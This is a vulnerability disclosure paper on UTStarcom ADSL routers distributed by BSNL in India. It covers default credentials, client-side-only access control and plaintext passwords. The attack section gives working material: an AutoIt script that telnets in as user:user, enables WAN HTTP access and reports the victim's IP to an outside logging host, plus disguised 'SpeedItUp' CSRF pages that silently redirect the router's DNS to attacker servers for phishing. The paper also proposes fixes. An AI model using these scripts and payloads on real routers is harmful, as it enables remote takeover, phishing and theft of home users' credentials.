The document summarizes vulnerabilities in UTSTARCOM routers distributed by BSNL in India that allow unauthorized access and control. The routers have hard-coded default credentials, lack proper access control, and have flaws that allow privileges to be escalated. This allows attackers to compromise routers remotely and carry out denial of service attacks, sniffing, or phishing. The document provides proof-of-concept code to remotely access and reconfigure victim routers without authentication. It is recommended to change default credentials, implement server-side access control instead of client-side scripts, and provide better user instructions.
Pwning the BSNL Users
SathyaPrakash.K aka Boris, Sathyaprakash222@gmail.com, www.boris-info.co.cc, Panimalar Engineering College, Chennai, India
Varun.V, varun89.malar@gmail.com, www.boris-info.co.cc, Panimalar Engineering College, Chennai, India
Abstract:
The most common home ADSL modem cum router which India's No 1 ISP uses is this UT-STARCOM product (UT300R2U). The router's embedded server has several flaws which make it vulnerable. The flaws, upon exploitation, give admin access to the router over WAN. Wireless router products of this company are also affected by this vulnerability. Possible attacks on compromised routers are Denial of Service attacks, remote sniffing, phishing, etc.
Affected firmware versions: UT300R2U series, software versions 3.08.BSNL_02.01.02_tr64, 3.12L.BSNL_01.A2pB023K.d20K_rc2 and more. We propose some countermeasure techniques to defeat these kinds of attacks.
1. UT-STARCOM:
The modem cum router of this US-based company, which is distributed by BSNL [1], runs a server on its hardware which is prone to several exploits.
The main failure of the server lies in its access control mechanisms, which are improperly sanitized.
2. Protection mechanisms:
The standard so-called protection mechanisms built into the router are as follows:
1. Remote HTTP access is blocked by default; this was once a famous vulnerability [2].
2. Access control determines which privilege should be given to which user groups, thereby preventing USER from accessing ADMIN functions.
3. Vulnerability Description:
3.1 Poor user validation:
The modem has 3 inbuilt users:
1. admin
2. user
3. support (non-existent)
These accounts have their respective usernames as the default password.
Most home users don't change the default ADMIN password. Some smart users do, but they aren't really smart enough to find out which user accounts are present in their ADSL modem + router.
When a user logs in to the modem as ADMIN, he has full access to the router, whereas when logged in as a limited USER, the user cannot modify any settings on the router. This is the protection mechanism implemented by the manufacturer.
3.1.1 User Privileges:
The privilege of access is not controlled at all; a simple JavaScript file (menuBCM.js) handles the privilege of access mechanism. menuBCM.js does nothing but hide specific menus from USER and show everything to ADMIN. This is insecure: once the path of a menu is known, anyone (USER) can request that page from the server, and the server replies with the result regardless of privileges.
3.1.2 Passwords:
The poor implementation of the server is shown by the password.html page. This page is called by the ADMIN user while changing the passwords for users. The page contains the passwords of the users in clear text, so that JavaScript can validate the change of passwords.
3.2 Telnet Service:
As I mentioned earlier, the privilege of user access is not controlled at all and JavaScript does it by hiding the menus. JavaScript obviously plays no part in a telnet session, hence ADMIN access is given to a USER in a telnet session.
4. Proof of Concept:
Let's have a look at the source code of the JavaScript which handles the access privilege mechanism.
menuBCM.js:
function menuAdmin(options) { // All the options are displayed for ADMIN
   var std = options[MENU_OPTION_STANDARD];
   var proto = options[MENU_OPTION_PROTOCOL];
   var firewall = options[MENU_OPTION_FIREWALL];
   var nat = options[MENU_OPTION_NAT];
   var ipExt = options[MENU_OPTION_IP_EXTENSION];
   var wireless = options[MENU_OPTION_WIRELESS];
   var voice = options[MENU_OPTION_VOICE];
   var snmp = options[MENU_OPTION_SNMP];
   var ddnsd = options[MENU_OPTION_DDNSD];
   var sntp = options[MENU_OPTION_SNTP];
   .
   .
   if ( user == 'admin' ) // this piece of code calls the respective menu to be displayed
      menuAdmin(options);
   else if ( user == 'support' )
      menuSupport(options);
   else if ( user == 'user' )
      menuUser();
}
-------------code truncated
Each menu is assigned to a variable, and the respective set of menus is called depending on the user logged in.
Accessing the router as ADMIN:
Accessing the router as USER:
Accessing the password page in USER mode of privilege:
Navigating /password.html
Source code of password.html
<script language="javascript">
<!-- hide
pwdAdmin = 'lame'; // Passwords for all users are passed in plaintext for comparing
pwdSupport = 'support';
pwdUser = 'user';
function btnApply() {
   var loc = 'password.cgi?';
   with ( document.forms[0] ) {
      var idx = userName.selectedIndex;
      switch ( idx ) {
         case 0:
            alert("No username is selected.");
            return;
         case 1:
            if ( pwdOld.value == pwdAdmin )
               break;
            else {
               alert("Old admin password is wrong.");
               return;
            }
         case 2:
            if ( pwdOld.value == pwdSupport )
               break;
            else {
               alert("Old support password is wrong.");
-------------------------- truncated
Passwords in plain text are compared with the ones the user enters while changing old passwords.
Telnet Access:
When connecting through telnet, USER is given ADMIN access.
5. Compromising the Router:
From the above analysis we have determined that the entry point into the router is through the default passwords, since no one is concerned about the USER account.
5.1. Malware
The default IP address for the UTSTARCOM ADSL router is 192.168.1.1; however, if the default address has been changed, we could enumerate it with a few extra lines of code in the malware.
The task of the malware is to telnet into the victim's router using the user:user combination, enable WAN HTTP access on the router, and log the victim's external IP address to the attacker. The attacker can then navigate to the IP address from his logs and will be greeted by the victim's router (assuming port 80 on the WAN is not forwarded). Using the user:user combination, the attacker can log in to the victim's router, and by navigating to the /password.html page the admin password can be obtained.
Here is my custom script in AutoIt[3] doing the job:
Bjacker V 1.0
#include <IE.au3>
$oIE = _IECreate ("www.boris222.0fees.net/ip.php")
_IENavigate ($oIE, "www.boris222.0fees.net/ip.php");
Run ("telnet.exe 192.168.1.1 ")
Sleep(1000)
Send("user")
Send("{ENTER}")
Sleep(1000)
Send("user")
Send("{ENTER}")
Send("remoteaccess enable --service http")
Send("{ENTER}")
Sleep(3000)
Send("logout")
Send("{ENTER}")
ProcessClose("telnet.exe")
http://attacker.net/ip.php has a script which logs the IP address of the victim in the attacker's MySQL database server.
When compiling this script into an exe, the executable can be made to run in hidden mode by specifying the necessary parameters.
remoteaccess enable --service http
This command enables HTTP access to the device through the WAN.
5.2. Web way (CSRF)
This method uses cross-site request forgery attacks[4] to log in to the victim's router, utilizing iframes to make the necessary configuration changes on the router in a hidden manner.
With the latest browsers having BEAP protection enabled, some strong social engineering skills are needed to carry out this attack successfully.
Bjacking V 1.1:
This is an advanced and most dangerous method of attack. Yes, it is true: when a BSNL user with a UTSTARCOM router/modem visits a webpage, he gets his router compromised.
This feature combines CSRF to log in to the router and change the remote access configuration, and it calls the IP logger to log the victim's IP. The entire process is hidden inside an IFRAME; however, modern-day browsers with BEAP would ask the user for confirmation to log in to 192.168.1.1, which could be bypassed by social engineering.
index.html
<html>
<head>
<title>SpeedItUp</title>
</head>
<body>
<br><h1>This page configures your system to use high speed internet, please wait for few seconds for the script to configure</h1></br>
Please click the button to continue.
<iframe src ="config.html" width=70 marginwidth="25%" height=20 scrolling="no" frameborder="0" class="iframe"></iframe>
</body>
</html>
This is the attack of special interest to us, as it is one of the stealthiest attacks when combined with routing attacks.
The attacker could specify a fake DNS server for the victim router and could carry out phishing attacks.
http://192.168.1.1/dnscfg.cgi?dnsPrimary=4.1.1.1&dnsSecondary=2.1.2.3&dnsDynamic=0&dnsRefresh=1
This changes the primary and secondary DNS servers of the victim's router.
Victim's Network Layout:
This is the normal (usual) network setup of a home user.
Normal Operation:
The router has a default DNS server assigned by the ISP. Sometimes it may be provided by a DHCP server.
index.html
<html>
<head>
<title>SpeedItUp</title>
</head>
<body>
<br><h1>This page configures your system to use high speed internet, please wait for few seconds for the script to configure</h1></br>
Please click the button to continue.
<iframe src ="config.html" width=70 marginwidth="25%" height=20 scrolling="no" frameborder="0" class="iframe"></iframe>
</body>
</html>
config.html
<html>
<body onload="window.scrollTo(1440, 980);">
<iframe src="http://user:user@192.168.1.1/dnscfg.cgi?dnsPrimary=113.21.12.31&dnsSecondary=113.21.12.31&dnsDynamic=0&dnsRefresh=1" width=3000 height=1000 frameborder=0></iframe>
</body>
</html>
The above script changes the primary and secondary DNS servers as specified by the attacker.
Attack Scenario:
The DNS server specified by the attacker phishes all the famous sites (e-mail, netbanking, social networking, etc.).
Some advanced users might wonder about SSL (https); for them there comes the routing attack.
By specifying a static route through the attacker's network, MITM attacks can be carried out. Using SSL Strip[5] does the job for advanced users.
Statistics[6]:
And these are the statistics for the number of BSNL users. Most of the North Indian BSNL clients are provided with Huawei modem-cum-routers and they are not affected by this vulnerability (I haven't reviewed it), and the remaining are given this UTStarcom product, so nearly 20% of Indian Internet users are vulnerable to this exploit.
Solution:
Temporary: Change the default password for the ADMIN and USER groups of users, as the default user:user combination lets the attacker intrude into the router.
Permanent: Get rid of those nasty JavaScripts and implement the access control using server-side scripts storing cookies. Access control using client-side scripting is completely ridiculous, as the client can do anything.
Last but not least: “Don’t give dumb instructions[7] for home users on configuring the device.”